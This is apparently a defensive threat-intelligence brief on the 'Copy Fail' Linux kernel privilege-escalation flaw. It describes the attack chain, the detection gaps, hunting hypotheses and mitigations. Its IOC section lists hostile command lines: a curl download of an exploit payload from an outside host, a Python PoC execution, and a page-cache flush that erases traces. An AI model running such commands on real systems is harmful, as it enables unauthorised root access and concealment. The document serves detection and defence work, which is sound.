Copy Fail Flaw: 5 YARA Rules for Detection

What Happened

A critical security flaw called 'Copy Fail' has been discovered in the core component of most Linux operating systems released since 2017. This vulnerability allows any standard user on a system to instantly gain full administrative control without needing a password. It is particularly dangerous because it leaves no traces on the hard drive, making it invisible to many standard security tools. Organizations using Linux servers, especially in shared or cloud environments, should immediately apply the latest security patches provided by their operating system vendors.

Key Takeaways

• CVE-2026-31431 (Copy Fail) is a critical local privilege escalation flaw affecting major Linux distributions since 2017.
• The vulnerability allows unprivileged users to gain root access by modifying the in-memory page cache of setuid binaries.
• Exploitation leaves no on-disk traces, bypassing standard file integrity monitoring (FIM) tools.
• Multiple functional Proof-of-Concept (PoC) exploits are publicly available, including Python scripts and compiled C variants.
• Detection relies heavily on identifying the 'authencesn(hmac(sha256),cbc(aes))' string combined with AF_ALG socket and splice() usage.

Affected Systems

• Linux kernel versions 4.14 through 7.0-rc
• Ubuntu 24.04 LTS
• Amazon Linux 2023
• RHEL 14.3
• SUSE 16

Vulnerabilities (CVEs)

• CVE-2026-31431

Attack Chain

An unprivileged local attacker executes a Python or C exploit script that binds an AF_ALG socket to the authencesn cryptographic template. Using the splice() and sendmsg() system calls, the exploit triggers a 4-byte write into the in-memory page cache of a setuid binary, such as /usr/bin/su. This memory corruption injects shellcode that executes setuid(0) and spawns a root shell. Some variants subsequently flush the page cache to remove traces of the memory corruption and prevent other users from triggering the shellcode.

Detection Availability

• YARA Rules: Yes
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No
• Platforms: ReversingLabs, Florian Roth, Malware Utkonos

The article provides multiple YARA rules for detecting Python PoC scripts, compiled ELF variants, and specific shellcode patterns associated with the Copy Fail exploit.

Detection Engineering Assessment

EDR Visibility: Low — The exploit modifies the in-memory page cache directly, bypassing the VFS write path. On-disk files remain unchanged, meaning standard file integrity monitoring (FIM) and static disk scans will not detect the modification. Network Visibility: None — This is a local privilege escalation vulnerability that does not generate network traffic, unless a dropper script is used to fetch the payload. Detection Difficulty: Hard — Because the exploit operates entirely in memory and uses standard system calls (splice, sendmsg) and legitimate kernel crypto APIs, distinguishing malicious usage from benign operations requires deep memory inspection or highly specific behavioral rules.

Required Log Sources

• Process Execution Logs (e.g., auditd, Sysmon for Linux)
• Command Line Logging

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Consider hunting for process executions involving Python scripts that contain the string 'authencesn(hmac(sha256),cbc(aes))' combined with 'os.splice'.	Process command line logs, script block logging, or memory scans.	Execution	Low
Evaluate whether any unprivileged processes are unexpectedly executing setuid binaries like /usr/bin/su or /etc/passwd immediately followed by a root shell spawn.	Process creation logs (auditd/Sysmon for Linux Event ID 1).	Privilege Escalation	Medium
Consider hunting for commands that flush the page cache (e.g., 'echo 3 >/proc/sys/vm/drop_caches') executed by interactive shells, which may indicate post-exploitation cleanup.	Command line logs.	Defense Evasion	Medium

Control Gaps

• File Integrity Monitoring (FIM) tools relying on on-disk hashes
• Traditional Antivirus relying on static file signatures

Key Behavioral Indicators

• Usage of AF_ALG socket bound to authencesn(hmac(sha256),cbc(aes))
• Calls to splice() targeting setuid binaries
• Execution of 'echo 3 >/proc/sys/vm/drop_caches' after setuid binary execution

False Positive Assessment

• Low for exact PoC matches; Medium for broad hunting rules targeting the 'authencesn' and 'splice' primitive, as this may trigger on legitimate cryptographic testing code.

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider applying the latest kernel patches provided by your Linux distribution vendor to address CVE-2026-31431.
• If patching is not immediately feasible, evaluate whether you can restrict access to the AF_ALG socket interface or the authencesn module, where supported by your environment.

Infrastructure Hardening

• Evaluate whether multi-tenant servers and container clusters can be segmented to reduce the impact of a local privilege escalation.
• Consider implementing strict least-privilege access controls for local accounts on critical Linux infrastructure.

User Protection

• If your EDR supports memory scanning, consider deploying the provided YARA rules to scan for in-memory exploit artifacts.

Security Awareness

• Consider educating development and operations teams about the risks of running untrusted code in shared CI/CD pipelines or container environments.

MITRE ATT&CK Mapping

• T1068 - Exploitation for Privilege Escalation
• T1106 - Native API
• T1059.006 - Command and Scripting Interpreter: Python
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1070 - Indicator Removal

Additional IOCs

• File Hashes:
  • 3c5ec61632d0699e048d8428461c4d65f89988a370396db2f070f63ebbf9dbae (sha256) - Python PoC variant
  • d401e7d1c00605749d6c617ace73ab20a762b72e41c2e1590331596e38219a61 (sha256) - Python PoC variant
  • e097ce64b1bf0933e69c9d342038fb52f4b278da62b265daa3adf22c00658a9c (sha256) - Python PoC variant
  • 7ef953069578beef7daf2d984d16351b0c60c6adcbf8062ffbfaac6ce944c1da (sha256) - Compiled shellcode ELF payload
  • 01881b737c106a6d84e8e12cb417671b5f612f13adcb6cb1edd8a46704ddd252 (sha256) - Compiled shellcode ELF payload
  • 624d27965a570bc891a87bd62dab28fe401b145e1cbeea6caebcc53a7689bd9d (sha256) - Compiled shellcode ELF payload
  • 8813ad1310ed2e1c1e58cdef0169bef5f38f58b740bd170a370d4baf03dfde99 (sha256) - Compiled shellcode ELF payload
  • fd27a1d93dfc6afb3f705421449c87069595282c91e279660cb06c384d2acaea (sha256) - Compiled shellcode ELF payload
  • 32a2bd2c5f64b05d5db729a42633b792e00e56dd3e4644d21a6e45273b235dbd (sha256) - Compiled shellcode ELF payload
  • 989854c46208c6c1304e2d7038ecabea0cf19f39e6fda3d28576837c22961f21 (sha256) - Compiled shellcode ELF payload
  • 44900c631391f0d60eb6d271b8374a08dc1d9be76e403390d27a91ed5f179be9 (sha256) - Compiled shellcode ELF payload
  • 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae (sha256) - Compiled shellcode ELF payload
  • d86251e90db613329d4be9cf0355caa69ae88f7416be82a6880b8f9f7b7e691b (sha256) - Compiled shellcode ELF payload
  • f6dda491e85981feb1c0900f2b16f556e7aa2ca79b569b1180549cae58c22f98 (sha256) - Compiled shellcode ELF payload
  • 1ce3dc778637cd78e20f115fe1e47debf16d6af538daf95dff14243111779e28 (sha256) - Compiled shellcode ELF payload
  • 60b1645b1f3ad7f6391243d58a2a31f974e1599364564a69594b96ba21abe375 (sha256) - Compiled shellcode ELF payload
  • c6dd71f1f41c5d6fca0d3261a5ae9e49d01d6755c62d487e9a0cd7de933d6f64 (sha256) - Compiled shellcode ELF payload
  • b35ddf2ecd035faf9b38af62779502b7fa19037115054a00ed8d5327a3f2ec03 (sha256) - blasty goodcopy.c source code
• Command Lines:
  • Purpose: Flush page cache after execution to clean up memory corruption | Tools: echo | Stage: Defense Evasion | echo 3 >/proc/sys/vm/drop_caches
  • Purpose: Download exploit payload via dropper script | Tools: curl | Stage: Delivery | curl https://copy.fail/exp
  • Purpose: Execute Python PoC exploit | Tools: python3 | Stage: Execution | python3 copy_fail